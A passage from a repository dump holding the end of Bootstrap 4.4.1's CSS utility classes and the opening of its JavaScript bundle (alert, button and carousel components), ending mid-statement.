Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace !important; } .text-justify { text-align: justify !important; } .text-wrap { white-space: normal !important; } .text-nowrap { white-space: nowrap !important; } .text-truncate { overflow: hidden; text-overflow: ellipsis; white-space: nowrap; } .text-left { text-align: left !important; } .text-right { text-align: right !important; } .text-center { text-align: center !important; } @media (min-width: 576px) { .text-sm-left { text-align: left !important; } .text-sm-right { text-align: right !important; } .text-sm-center { text-align: center !important; } } @media (min-width: 768px) { .text-md-left { text-align: left !important; } .text-md-right { text-align: right !important; } .text-md-center { text-align: center !important; } } @media (min-width: 992px) { .text-lg-left { text-align: left !important; } .text-lg-right { text-align: right !important; } .text-lg-center { text-align: center !important; } } @media (min-width: 1200px) { .text-xl-left { text-align: left !important; } .text-xl-right { text-align: right !important; } .text-xl-center { text-align: center !important; } } .text-lowercase { text-transform: lowercase !important; } .text-uppercase { text-transform: uppercase !important; } .text-capitalize { text-transform: capitalize !important; } .font-weight-light { font-weight: 300 !important; } .font-weight-lighter { font-weight: lighter !important; } .font-weight-normal { font-weight: 400 !important; } .font-weight-bold { font-weight: 700 !important; } .font-weight-bolder { font-weight: bolder !important; } .font-italic { font-style: italic !important; } .text-white { color: #fff !important; } .text-primary { color: #007bff !important; } a.text-primary:hover, a.text-primary:focus { color: #0056b3 !important; } .text-secondary { color: #6c757d !important; } a.text-secondary:hover, a.text-secondary:focus { color: #494f54 !important; } .text-success { color: #28a745 !important; } a.text-success:hover, a.text-success:focus { color: #19692c !important; } .text-info { color: #17a2b8 !important; } a.text-info:hover, a.text-info:focus { color: #0f6674 !important; } .text-warning { color: #ffc107 !important; } a.text-warning:hover, a.text-warning:focus { color: #ba8b00 !important; } .text-danger { color: #dc3545 !important; } a.text-danger:hover, a.text-danger:focus { color: #a71d2a !important; } .text-light { color: #f8f9fa !important; } a.text-light:hover, a.text-light:focus { color: #cbd3da !important; } .text-dark { color: #343a40 !important; } a.text-dark:hover, a.text-dark:focus { color: #121416 !important; } .text-body { color: #212529 !important; } .text-muted { color: #6c757d !important; } .text-black-50 { color: rgba(0, 0, 0, 0.5) !important; } .text-white-50 { color: rgba(255, 255, 255, 0.5) !important; } .text-hide { font: 0/0 a; color: transparent; text-shadow: none; background-color: transparent; border: 0; } .text-decoration-none { text-decoration: none !important; } .text-break { word-break: break-word !important; overflow-wrap: break-word !important; } .text-reset { color: inherit !important; } .visible { visibility: visible !important; } .invisible { visibility: hidden !important; } @media print { *, *::before, *::after { text-shadow: none !important; box-shadow: none !important; } a:not(.btn) { text-decoration: underline; } abbr[title]::after { content: " (" attr(title) ")"; } pre { white-space: pre-wrap !important; } pre, blockquote { border: 1px solid #adb5bd; page-break-inside: avoid; } thead { display: table-header-group; } tr, img { page-break-inside: avoid; } p, h2, h3 { orphans: 3; widows: 3; } h2, h3 { page-break-after: avoid; } @page { size: a3; } body { min-width: 992px !important; } .container { min-width: 992px !important; } .navbar { display: none; } .badge { border: 1px solid #000; } .table { border-collapse: collapse !important; } .table td, .table th { background-color: #fff !important; } .table-bordered th, .table-bordered td { border: 1px solid #dee2e6 !important; } .table-dark { color: inherit; } .table-dark th, .table-dark td, .table-dark thead th, .table-dark tbody + tbody { border-color: #dee2e6; } .table .thead-dark th { color: inherit; border-color: #dee2e6; } } /*# sourceMappingURL=bootstrap.css.map */ ================================================ FILE: static/vendor/bootstrap-4.4.1-dist/js/bootstrap.bundle.js ================================================ /*! * Bootstrap v4.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ (function (global, factory) { typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('jquery')) : typeof define === 'function' && define.amd ? define(['exports', 'jquery'], factory) : (global = global || self, factory(global.bootstrap = {}, global.jQuery)); }(this, (function (exports, $) { 'use strict'; $ = $ && $.hasOwnProperty('default') ? $['default'] : $; function _defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } function _createClass(Constructor, protoProps, staticProps) { if (protoProps) _defineProperties(Constructor.prototype, protoProps); if (staticProps) _defineProperties(Constructor, staticProps); return Constructor; } function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; } function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); if (enumerableOnly) symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; }); keys.push.apply(keys, symbols); } return keys; } function _objectSpread2(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(Object(source), true).forEach(function (key) { _defineProperty(target, key, source[key]); }); } else if (Object.getOwnPropertyDescriptors) { Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)); } else { ownKeys(Object(source)).forEach(function (key) { Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key)); }); } } return target; } function _inheritsLoose(subClass, superClass) { subClass.prototype = Object.create(superClass.prototype); subClass.prototype.constructor = subClass; subClass.__proto__ = superClass; } /** * -------------------------------------------------------------------------- * Bootstrap (v4.4.1): util.js * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) * -------------------------------------------------------------------------- */ /** * ------------------------------------------------------------------------ * Private TransitionEnd Helpers * ------------------------------------------------------------------------ */ var TRANSITION_END = 'transitionend'; var MAX_UID = 1000000; var MILLISECONDS_MULTIPLIER = 1000; // Shoutout AngusCroll (https://goo.gl/pxwQGp) function toType(obj) { return {}.toString.call(obj).match(/\s([a-z]+)/i)[1].toLowerCase(); } function getSpecialTransitionEndEvent() { return { bindType: TRANSITION_END, delegateType: TRANSITION_END, handle: function handle(event) { if ($(event.target).is(this)) { return event.handleObj.handler.apply(this, arguments); // eslint-disable-line prefer-rest-params } return undefined; // eslint-disable-line no-undefined } }; } function transitionEndEmulator(duration) { var _this = this; var called = false; $(this).one(Util.TRANSITION_END, function () { called = true; }); setTimeout(function () { if (!called) { Util.triggerTransitionEnd(_this); } }, duration); return this; } function setTransitionEndSupport() { $.fn.emulateTransitionEnd = transitionEndEmulator; $.event.special[Util.TRANSITION_END] = getSpecialTransitionEndEvent(); } /** * -------------------------------------------------------------------------- * Public Util Api * -------------------------------------------------------------------------- */ var Util = { TRANSITION_END: 'bsTransitionEnd', getUID: function getUID(prefix) { do { // eslint-disable-next-line no-bitwise prefix += ~~(Math.random() * MAX_UID); // "~~" acts like a faster Math.floor() here } while (document.getElementById(prefix)); return prefix; }, getSelectorFromElement: function getSelectorFromElement(element) { var selector = element.getAttribute('data-target'); if (!selector || selector === '#') { var hrefAttr = element.getAttribute('href'); selector = hrefAttr && hrefAttr !== '#' ? hrefAttr.trim() : ''; } try { return document.querySelector(selector) ? selector : null; } catch (err) { return null; } }, getTransitionDurationFromElement: function getTransitionDurationFromElement(element) { if (!element) { return 0; } // Get transition-duration of the element var transitionDuration = $(element).css('transition-duration'); var transitionDelay = $(element).css('transition-delay'); var floatTransitionDuration = parseFloat(transitionDuration); var floatTransitionDelay = parseFloat(transitionDelay); // Return 0 if element or transition duration is not found if (!floatTransitionDuration && !floatTransitionDelay) { return 0; } // If multiple durations are defined, take the first transitionDuration = transitionDuration.split(',')[0]; transitionDelay = transitionDelay.split(',')[0]; return (parseFloat(transitionDuration) + parseFloat(transitionDelay)) * MILLISECONDS_MULTIPLIER; }, reflow: function reflow(element) { return element.offsetHeight; }, triggerTransitionEnd: function triggerTransitionEnd(element) { $(element).trigger(TRANSITION_END); }, // TODO: Remove in v5 supportsTransitionEnd: function supportsTransitionEnd() { return Boolean(TRANSITION_END); }, isElement: function isElement(obj) { return (obj[0] || obj).nodeType; }, typeCheckConfig: function typeCheckConfig(componentName, config, configTypes) { for (var property in configTypes) { if (Object.prototype.hasOwnProperty.call(configTypes, property)) { var expectedTypes = configTypes[property]; var value = config[property]; var valueType = value && Util.isElement(value) ? 'element' : toType(value); if (!new RegExp(expectedTypes).test(valueType)) { throw new Error(componentName.toUpperCase() + ": " + ("Option \"" + property + "\" provided type \"" + valueType + "\" ") + ("but expected type \"" + expectedTypes + "\".")); } } } }, findShadowRoot: function findShadowRoot(element) { if (!document.documentElement.attachShadow) { return null; } // Can find the shadow root otherwise it'll return the document if (typeof element.getRootNode === 'function') { var root = element.getRootNode(); return root instanceof ShadowRoot ? root : null; } if (element instanceof ShadowRoot) { return element; } // when we don't find a shadow root if (!element.parentNode) { return null; } return Util.findShadowRoot(element.parentNode); }, jQueryDetection: function jQueryDetection() { if (typeof $ === 'undefined') { throw new TypeError('Bootstrap\'s JavaScript requires jQuery. jQuery must be included before Bootstrap\'s JavaScript.'); } var version = $.fn.jquery.split(' ')[0].split('.'); var minMajor = 1; var ltMajor = 2; var minMinor = 9; var minPatch = 1; var maxMajor = 4; if (version[0] < ltMajor && version[1] < minMinor || version[0] === minMajor && version[1] === minMinor && version[2] < minPatch || version[0] >= maxMajor) { throw new Error('Bootstrap\'s JavaScript requires at least jQuery v1.9.1 but less than v4.0.0'); } } }; Util.jQueryDetection(); setTransitionEndSupport(); /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME = 'alert'; var VERSION = '4.4.1'; var DATA_KEY = 'bs.alert'; var EVENT_KEY = "." + DATA_KEY; var DATA_API_KEY = '.data-api'; var JQUERY_NO_CONFLICT = $.fn[NAME]; var Selector = { DISMISS: '[data-dismiss="alert"]' }; var Event = { CLOSE: "close" + EVENT_KEY, CLOSED: "closed" + EVENT_KEY, CLICK_DATA_API: "click" + EVENT_KEY + DATA_API_KEY }; var ClassName = { ALERT: 'alert', FADE: 'fade', SHOW: 'show' }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Alert = /*#__PURE__*/ function () { function Alert(element) { this._element = element; } // Getters var _proto = Alert.prototype; // Public _proto.close = function close(element) { var rootElement = this._element; if (element) { rootElement = this._getRootElement(element); } var customEvent = this._triggerCloseEvent(rootElement); if (customEvent.isDefaultPrevented()) { return; } this._removeElement(rootElement); }; _proto.dispose = function dispose() { $.removeData(this._element, DATA_KEY); this._element = null; } // Private ; _proto._getRootElement = function _getRootElement(element) { var selector = Util.getSelectorFromElement(element); var parent = false; if (selector) { parent = document.querySelector(selector); } if (!parent) { parent = $(element).closest("." + ClassName.ALERT)[0]; } return parent; }; _proto._triggerCloseEvent = function _triggerCloseEvent(element) { var closeEvent = $.Event(Event.CLOSE); $(element).trigger(closeEvent); return closeEvent; }; _proto._removeElement = function _removeElement(element) { var _this = this; $(element).removeClass(ClassName.SHOW); if (!$(element).hasClass(ClassName.FADE)) { this._destroyElement(element); return; } var transitionDuration = Util.getTransitionDurationFromElement(element); $(element).one(Util.TRANSITION_END, function (event) { return _this._destroyElement(element, event); }).emulateTransitionEnd(transitionDuration); }; _proto._destroyElement = function _destroyElement(element) { $(element).detach().trigger(Event.CLOSED).remove(); } // Static ; Alert._jQueryInterface = function _jQueryInterface(config) { return this.each(function () { var $element = $(this); var data = $element.data(DATA_KEY); if (!data) { data = new Alert(this); $element.data(DATA_KEY, data); } if (config === 'close') { data[config](this); } }); }; Alert._handleDismiss = function _handleDismiss(alertInstance) { return function (event) { if (event) { event.preventDefault(); } alertInstance.close(this); }; }; _createClass(Alert, null, [{ key: "VERSION", get: function get() { return VERSION; } }]); return Alert; }(); /** * ------------------------------------------------------------------------ * Data Api implementation * ------------------------------------------------------------------------ */ $(document).on(Event.CLICK_DATA_API, Selector.DISMISS, Alert._handleDismiss(new Alert())); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME] = Alert._jQueryInterface; $.fn[NAME].Constructor = Alert; $.fn[NAME].noConflict = function () { $.fn[NAME] = JQUERY_NO_CONFLICT; return Alert._jQueryInterface; }; /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$1 = 'button'; var VERSION$1 = '4.4.1'; var DATA_KEY$1 = 'bs.button'; var EVENT_KEY$1 = "." + DATA_KEY$1; var DATA_API_KEY$1 = '.data-api'; var JQUERY_NO_CONFLICT$1 = $.fn[NAME$1]; var ClassName$1 = { ACTIVE: 'active', BUTTON: 'btn', FOCUS: 'focus' }; var Selector$1 = { DATA_TOGGLE_CARROT: '[data-toggle^="button"]', DATA_TOGGLES: '[data-toggle="buttons"]', DATA_TOGGLE: '[data-toggle="button"]', DATA_TOGGLES_BUTTONS: '[data-toggle="buttons"] .btn', INPUT: 'input:not([type="hidden"])', ACTIVE: '.active', BUTTON: '.btn' }; var Event$1 = { CLICK_DATA_API: "click" + EVENT_KEY$1 + DATA_API_KEY$1, FOCUS_BLUR_DATA_API: "focus" + EVENT_KEY$1 + DATA_API_KEY$1 + " " + ("blur" + EVENT_KEY$1 + DATA_API_KEY$1), LOAD_DATA_API: "load" + EVENT_KEY$1 + DATA_API_KEY$1 }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Button = /*#__PURE__*/ function () { function Button(element) { this._element = element; } // Getters var _proto = Button.prototype; // Public _proto.toggle = function toggle() { var triggerChangeEvent = true; var addAriaPressed = true; var rootElement = $(this._element).closest(Selector$1.DATA_TOGGLES)[0]; if (rootElement) { var input = this._element.querySelector(Selector$1.INPUT); if (input) { if (input.type === 'radio') { if (input.checked && this._element.classList.contains(ClassName$1.ACTIVE)) { triggerChangeEvent = false; } else { var activeElement = rootElement.querySelector(Selector$1.ACTIVE); if (activeElement) { $(activeElement).removeClass(ClassName$1.ACTIVE); } } } else if (input.type === 'checkbox') { if (this._element.tagName === 'LABEL' && input.checked === this._element.classList.contains(ClassName$1.ACTIVE)) { triggerChangeEvent = false; } } else { // if it's not a radio button or checkbox don't add a pointless/invalid checked property to the input triggerChangeEvent = false; } if (triggerChangeEvent) { input.checked = !this._element.classList.contains(ClassName$1.ACTIVE); $(input).trigger('change'); } input.focus(); addAriaPressed = false; } } if (!(this._element.hasAttribute('disabled') || this._element.classList.contains('disabled'))) { if (addAriaPressed) { this._element.setAttribute('aria-pressed', !this._element.classList.contains(ClassName$1.ACTIVE)); } if (triggerChangeEvent) { $(this._element).toggleClass(ClassName$1.ACTIVE); } } }; _proto.dispose = function dispose() { $.removeData(this._element, DATA_KEY$1); this._element = null; } // Static ; Button._jQueryInterface = function _jQueryInterface(config) { return this.each(function () { var data = $(this).data(DATA_KEY$1); if (!data) { data = new Button(this); $(this).data(DATA_KEY$1, data); } if (config === 'toggle') { data[config](); } }); }; _createClass(Button, null, [{ key: "VERSION", get: function get() { return VERSION$1; } }]); return Button; }(); /** * ------------------------------------------------------------------------ * Data Api implementation * ------------------------------------------------------------------------ */ $(document).on(Event$1.CLICK_DATA_API, Selector$1.DATA_TOGGLE_CARROT, function (event) { var button = event.target; if (!$(button).hasClass(ClassName$1.BUTTON)) { button = $(button).closest(Selector$1.BUTTON)[0]; } if (!button || button.hasAttribute('disabled') || button.classList.contains('disabled')) { event.preventDefault(); // work around Firefox bug #1540995 } else { var inputBtn = button.querySelector(Selector$1.INPUT); if (inputBtn && (inputBtn.hasAttribute('disabled') || inputBtn.classList.contains('disabled'))) { event.preventDefault(); // work around Firefox bug #1540995 return; } Button._jQueryInterface.call($(button), 'toggle'); } }).on(Event$1.FOCUS_BLUR_DATA_API, Selector$1.DATA_TOGGLE_CARROT, function (event) { var button = $(event.target).closest(Selector$1.BUTTON)[0]; $(button).toggleClass(ClassName$1.FOCUS, /^focus(in)?$/.test(event.type)); }); $(window).on(Event$1.LOAD_DATA_API, function () { // ensure correct active class is set to match the controls' actual values/states // find all checkboxes/readio buttons inside data-toggle groups var buttons = [].slice.call(document.querySelectorAll(Selector$1.DATA_TOGGLES_BUTTONS)); for (var i = 0, len = buttons.length; i < len; i++) { var button = buttons[i]; var input = button.querySelector(Selector$1.INPUT); if (input.checked || input.hasAttribute('checked')) { button.classList.add(ClassName$1.ACTIVE); } else { button.classList.remove(ClassName$1.ACTIVE); } } // find all button toggles buttons = [].slice.call(document.querySelectorAll(Selector$1.DATA_TOGGLE)); for (var _i = 0, _len = buttons.length; _i < _len; _i++) { var _button = buttons[_i]; if (_button.getAttribute('aria-pressed') === 'true') { _button.classList.add(ClassName$1.ACTIVE); } else { _button.classList.remove(ClassName$1.ACTIVE); } } }); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME$1] = Button._jQueryInterface; $.fn[NAME$1].Constructor = Button; $.fn[NAME$1].noConflict = function () { $.fn[NAME$1] = JQUERY_NO_CONFLICT$1; return Button._jQueryInterface; }; /** * ------------------------------------------------------------------------ * Constants * ------------------------------------------------------------------------ */ var NAME$2 = 'carousel'; var VERSION$2 = '4.4.1'; var DATA_KEY$2 = 'bs.carousel'; var EVENT_KEY$2 = "." + DATA_KEY$2; var DATA_API_KEY$2 = '.data-api'; var JQUERY_NO_CONFLICT$2 = $.fn[NAME$2]; var ARROW_LEFT_KEYCODE = 37; // KeyboardEvent.which value for left arrow key var ARROW_RIGHT_KEYCODE = 39; // KeyboardEvent.which value for right arrow key var TOUCHEVENT_COMPAT_WAIT = 500; // Time for mouse compat events to fire after touch var SWIPE_THRESHOLD = 40; var Default = { interval: 5000, keyboard: true, slide: false, pause: 'hover', wrap: true, touch: true }; var DefaultType = { interval: '(number|boolean)', keyboard: 'boolean', slide: '(boolean|string)', pause: '(string|boolean)', wrap: 'boolean', touch: 'boolean' }; var Direction = { NEXT: 'next', PREV: 'prev', LEFT: 'left', RIGHT: 'right' }; var Event$2 = { SLIDE: "slide" + EVENT_KEY$2, SLID: "slid" + EVENT_KEY$2, KEYDOWN: "keydown" + EVENT_KEY$2, MOUSEENTER: "mouseenter" + EVENT_KEY$2, MOUSELEAVE: "mouseleave" + EVENT_KEY$2, TOUCHSTART: "touchstart" + EVENT_KEY$2, TOUCHMOVE: "touchmove" + EVENT_KEY$2, TOUCHEND: "touchend" + EVENT_KEY$2, POINTERDOWN: "pointerdown" + EVENT_KEY$2, POINTERUP: "pointerup" + EVENT_KEY$2, DRAG_START: "dragstart" + EVENT_KEY$2, LOAD_DATA_API: "load" + EVENT_KEY$2 + DATA_API_KEY$2, CLICK_DATA_API: "click" + EVENT_KEY$2 + DATA_API_KEY$2 }; var ClassName$2 = { CAROUSEL: 'carousel', ACTIVE: 'active', SLIDE: 'slide', RIGHT: 'carousel-item-right', LEFT: 'carousel-item-left', NEXT: 'carousel-item-next', PREV: 'carousel-item-prev', ITEM: 'carousel-item', POINTER_EVENT: 'pointer-event' }; var Selector$2 = { ACTIVE: '.active', ACTIVE_ITEM: '.active.carousel-item', ITEM: '.carousel-item', ITEM_IMG: '.carousel-item img', NEXT_PREV: '.carousel-item-next, .carousel-item-prev', INDICATORS: '.carousel-indicators', DATA_SLIDE: '[data-slide], [data-slide-to]', DATA_RIDE: '[data-ride="carousel"]' }; var PointerType = { TOUCH: 'touch', PEN: 'pen' }; /** * ------------------------------------------------------------------------ * Class Definition * ------------------------------------------------------------------------ */ var Carousel = /*#__PURE__*/ function () { function Carousel(element, config) { this._items = null; this._interval = null; this._activeElement = null; this._isPaused = false; this._isSliding = false; this.touchTimeout = null; this.touchStartX = 0; this.touchDeltaX = 0; this._config = this._getConfig(config); this._element = element; this._indicatorsElement = this._element.querySelector(Selector$2.INDICATORS); this._touchSupported = 'ontouchstart' in document.documentElement || navigator.maxTouchPoints > 0; this._pointerEvent = Boolean(window.PointerEvent || window.MSPointerEvent); this._addEventListeners(); } // Getters var _proto = Carousel.prototype; // Public _proto.next = function next() { if (!this._isSliding) { this._slide(Direction.NEXT); } }; _proto.nextWhenVisible = function nextWhenVisible() { // Don't call next when the page isn't visible // or the carousel or its parent isn't visible if (!document.hidden && $(this._element).is(':visible') && $(this._element).css('visibility') !== 'hidden') { this.next(); } }; _proto.prev = function prev() { if (!this._isSliding) { this._slide(Direction.PREV); } }; _proto.pause = function pause(event) { if (!event) { this._isPaused = true; } if (this._element.querySelector(Selector$2.NEXT_PREV)) { Util.triggerTransitionEnd(this._element); this.cycle(true); } clearInterval(this._interval); this._interval = null; }; _proto.cycle = function cycle(event) { if (!event) { this._isPaused = false; } if (this._interval) { clearInterval(this._interval); this._interval = null; } if (this._config.interval && !this._isPaused) { this._interval = setInterval((document.visibilityState ? this.nextWhenVisible : this.next).bind(this), this._config.interval); } }; _proto.to = function to(index) { var _this = this; this._activeElement = this._element.querySelector(Selector$2.ACTIVE_ITEM); var activeIndex = this._getItemIndex(this._activeElement); if (index > this._items.length - 1 || index < 0) { return; } if (this._isSliding) { $(this._element).one(Event$2.SLID, function () { return _this.to(index); }); return; } if (activeIndex === index) { this.pause(); this.cycle(); return; } var direction = index > activeIndex ? Direction.NEXT : Direction.PREV; this._slide(direction, this._items[index]); }; _proto.dispose = function dispose() { $(this._element).off(EVENT_KEY$2); $.removeData(this._element, DATA_KEY$2); this._items = null; this._config = null; this._element = null; this._interval = null; this._isPaused = null; this._isSliding = null; this._activeElement = null; this._indicatorsElement = null; } // Private ; _proto._getConfig = function _getConfig(config) { config = _objectSpread2({}, Default, {}, config); Util.typeCheckConfig(NAME$2, config, DefaultType); return config; }; _proto._handleSwipe = function _handleSwipe() { var absDeltax = Math.abs(this.touchDeltaX); if (absDeltax <= SWIPE_THRESHOLD) { return; } var direction = absDeltax / this.touchDeltaX; this.touchDeltaX = 0; // swipe left if (direction > 0) { this.prev(); } // swipe right if (direction < 0) { this.next(); } }; _proto._addEventListeners = function _addEventListeners() { var _this2 = this; if (this._config.keyboard) { $(this._element).on(Event$2.KEYDOWN, function (event) { return _this2._keydown(event); }); } if (this._config.pause === 'hover') { $(this._element).on(Event$2.MOUSEENTER, function (event) { return _this2.pause(event); }).on(Event$2.MOUSELEAVE, function (event) { return _this2.cycle(event); }); } if (this._config.touch) { this._addTouchEventListeners(); } }; _proto._addTouchEventListeners = function _addTouchEventListeners() { var _this3 = this; if (!this._touchSupported) { return; } var start = function start(event) { if (_this3._pointerEvent && PointerType[event.originalEvent.pointerType.toUpperCase()]) { _this3.touchStartX = event.originalEvent.clientX; } else if (!_this3._pointerEvent) { _this3.touchStartX = event.originalEvent.touches[0].clientX; } }; var move = function move(event) { // ensure swiping with one touch and not pinching if (event.originalEvent.touches && event.originalEvent.touches.length > 1) { _this3.touchDeltaX = 0; } else { _this3.touchDeltaX = event.originalEvent.touches[0].clientX - _this3.touchStartX; } }; var end = function end(event) { if (_this3._pointerEvent && PointerType[event.originalEvent.pointerType.toUpperCase()]) { _this3.touchDeltaX = event.originalEvent.clientX - _this3.touchStartX; } _this3._handleSwipe(); if (_this3._config.pause === 'hover') { // If it's a touch-enabled device, mouseenter/leave are fired as // part of the mouse compatibility events on first tap - the carousel // would stop cycling until user tapped out of it; // here, we listen for touchend, explicitly pause the carousel // (as if it's the second time we tap on it, mouseenter compat event // is NOT fired) and after a timeout (to allow for mouse compatibility // events to fire) we explicitly restart cycling _this3.pause(); if (_this3.touchTimeout) { clearTimeout(_this3.touchTimeout); } _this3.touchTimeout = setTimeout(function (event) { return _this3.cycle(event); }, TOUCHEVENT_COMPAT_WAIT + _this3._config.interval); } }; $(this._element.querySelectorAll(Selector$2.ITEM_IMG)).on(Event$2.DRAG_START, function (e) { return e.preventDefault(); }); if (this._pointerEvent) { $(this._element).on(Event$2.POINTERDOWN, function (event) { return start(event); }); $(this._element).on(Event$2.POINTERUP, function (event) { return end(event); }); this._element.classList.add(ClassName$2.POINTER_EVENT); } else { $(this._element).on(Event$2.TOUCHSTART, function (event) { return start(event); }); $(this._element).on(Event$2.TOUCHMOVE, function (event) { return move(event); }); $(this._element).on(Event$2.TOUCHEND, function (event) { return end(event); }); } }; _proto._keydown = function _keydown(event) { if (/input|textarea/i.test(event.target.tagName)) { return; } switch (event.which) { case ARROW_LEFT_KEYCODE: event.preventDefault(); this.prev(); break; case ARROW_RIGHT_KEYCODE: event.preventDefault(); this.next(); break; } }; _proto._getItemIndex = function _getItemIndex(element) { this._items = element && element.parentNode ? [].slice.call(element.parentNode.querySelectorAll(Selector$2.ITEM)) : []; return this._items.indexOf(element); }; _proto._getItemByDirection = function _getItemByDirection(direction, activeElement) { var isNextDirection = direction === Direction.NEXT; var isPrevDirection = direction === Direction.PREV; var activeIndex = this._getItemIndex(activeElement); var lastItemIndex = this._items.length - 1; var isGoingToWrap = isPrevDirection && activeIndex === 0 || isNextDirection && activeIndex === lastItemIndex; if (isGoingToWrap && !this._config.wrap) { return activeElement; } var delta = direction === Direction.PREV ? -1 : 1; var itemIndex = (activeIndex + delta) % this._items.length; return itemIndex === -1 ? this._items[this._items.length - 1] : this._items[itemIndex]; }; _proto._triggerSlideEvent = function _triggerSlideEvent(relatedTarget, eventDirectionName) { var targetIndex = this._getItemIndex(relatedTarget); var fromIndex = this._getItemIndex(this._element.querySelector(Selector$2.ACTIVE_ITEM)); var slideEvent = $.Event(Event$2.SLIDE, { relatedTarget: relatedTarget, direction: eventDirectionName, from: fromIndex, to: targetIndex }); $(this._element).trigger(slideEvent); return slideEvent; }; _proto._setActiveIndicatorElement = function _setActiveIndicatorElement(element) { if (this._indicatorsElement) { var indicators = [].slice.call(this._indicatorsElement.querySelectorAll(Selector$2.ACTIVE)); $(indicators).removeClass(ClassName$2.ACTIVE); var nextIndicator = this._indicatorsElement.children[this._getItemIndex(element)]; if (nextIndicator) { $(nextIndicator).addClass(ClassName$2.ACTIVE); } } }; _proto._slide = function _slide(direction, element) { var _this4 = this; var activeElement = this._element.querySelector(Selector$2.ACTIVE_ITEM); var activeElementIndex = this._getItemIndex(activeElement); var nextElement = element || activeElement && this._getItemByDirection(direction, activeElement); var nextElementIndex = this._getItemIndex(nextElement); var isCycling = Boolean(this._interval); var directionalClassName; var orderClassName; var eventDirectionName; if (direction === Direction.NEXT) { directionalClassName = ClassName$2.LEFT; orderClassName = ClassName$2.NEXT; eventDirectionName = Direction.LEFT; } else { directionalClassName = ClassName$2.RIGHT; orderClassName = ClassName$2.PREV; eventDirectionName = Direction.RIGHT; } if (nextElement && $(nextElement).hasClass(ClassName$2.ACTIVE)) { this._isSliding = false; return; } var slideEvent = this._triggerSlideEvent(nextElement, eventDirectionName); if (slideEvent.isDefaultPrevented()) { return; } if (!activeElement || !nextElement) { // Some weirdness is happening, so we bail return; } this._isSliding = true; if (isCycling) { this.pause(); } this._setActiveIndicatorElement(nextElement); var slidEvent = $.Event(Event$2.SLID, { relatedTarget: nextElement, direction: eventDirectionName, from: activeElementIndex, to: nextElementIndex }); if ($(this._element).hasClass(ClassName$2.SLIDE)) { $(nextElement).addClass(orderClassName); Util.reflow(nextElement); $(activeElement).addClass(directionalClassName); $(nextElement).addClass(directionalClassName); var nextElementInterval = parseInt(nextElement.getAttribute('data-interval'), 10); if (nextElementInterval) { this._config.defaultInterval = this._config.defaultInterval || this._config.interval; this._config.interval = nextElementInterval; } else { this._config.interval = this._config.defaultInterval || this._config.interval; } var transitionDuration = Util.getTransitionDurationFromElement(activeElement); $(activeElement).one(Util.TRANSITION_END, function () { $(nextElement).removeClass(directionalClassName + " " + orderClassName).addClass(ClassName$2.ACTIVE); $(activeElement).removeClass(ClassName$2.ACTIVE + " " + orderClassName + " " + directionalClassName); _this4._isSliding = false; setTimeout(function () { return $(_this4._element).trigger(slidEvent); }, 0); }).emulateTransitionEnd(transitionDuration); } else { $(activeElement).removeClass(ClassName$2.ACTIVE); $(nextElement).addClass(ClassName$2.ACTIVE); this._isSliding = false; $(this._element).trigger(slidEvent); } if (isCycling) { this.cycle(); } } // Static ; Carousel._jQueryInterface = function _jQueryInterface(config) { return this.each(function () { var data = $(this).data(DATA_KEY$2); var _config = _objectSpread2({}, Default, {}, $(this).data()); if (typeof config === 'object') { _config = _objectSpread2({}, _config, {}, config); } var action = typeof config === 'string' ? config : _config.slide; if (!data) { data = new Carousel(this, _config); $(this).data(DATA_KEY$2, data); } if (typeof config === 'number') { data.to(config); } else if (typeof action === 'string') { if (typeof data[action] === 'undefined') { throw new TypeError("No method named \"" + action + "\""); } data[action](); } else if (_config.interval && _config.ride) { data.pause(); data.cycle(); } }); }; Carousel._dataApiClickHandler = function _dataApiClickHandler(event) { var selector = Util.getSelectorFromElement(this); if (!selector) { return; } var target = $(selector)[0]; if (!target || !$(target).hasClass(ClassName$2.CAROUSEL)) { return; } var config = _objectSpread2({}, $(target).data(), {}, $(this).data()); var slideIndex = this.getAttribute('data-slide-to'); if (slideIndex) { config.interval = false; } Carousel._jQueryInterface.call($(target), config); if (slideIndex) { $(target).data(DATA_KEY$2).to(slideIndex); } event.preventDefault(); }; _createClass(Carousel, null, [{ key: "VERSION", get: function get() { return VERSION$2; } }, { key: "Default", get: function get() { return Default; } }]); return Carousel; }(); /** * ------------------------------------------------------------------------ * Data Api implementation * ------------------------------------------------------------------------ */ $(document).on(Event$2.CLICK_DATA_API, Selector$2.DATA_SLIDE, Carousel._dataApiClickHandler); $(window).on(Event$2.LOAD_DATA_API, function () { var carousels = [].slice.call(document.querySelectorAll(Selector$2.DATA_RIDE)); for (var i = 0, len = carousels.length; i < len; i++) { var $carousel = $(carousels[i]); Carousel._jQueryInterface.call($carousel, $carousel.data()); } }); /** * ------------------------------------------------------------------------ * jQuery * ------------------------------------------------------------------------ */ $.fn[NAME$2] = Carousel._jQueryInterface; $.fn[NAME$2].Constructor = Carousel; $.fn[NAME$2].noConflict = function () { $.fn[NAME$2] = 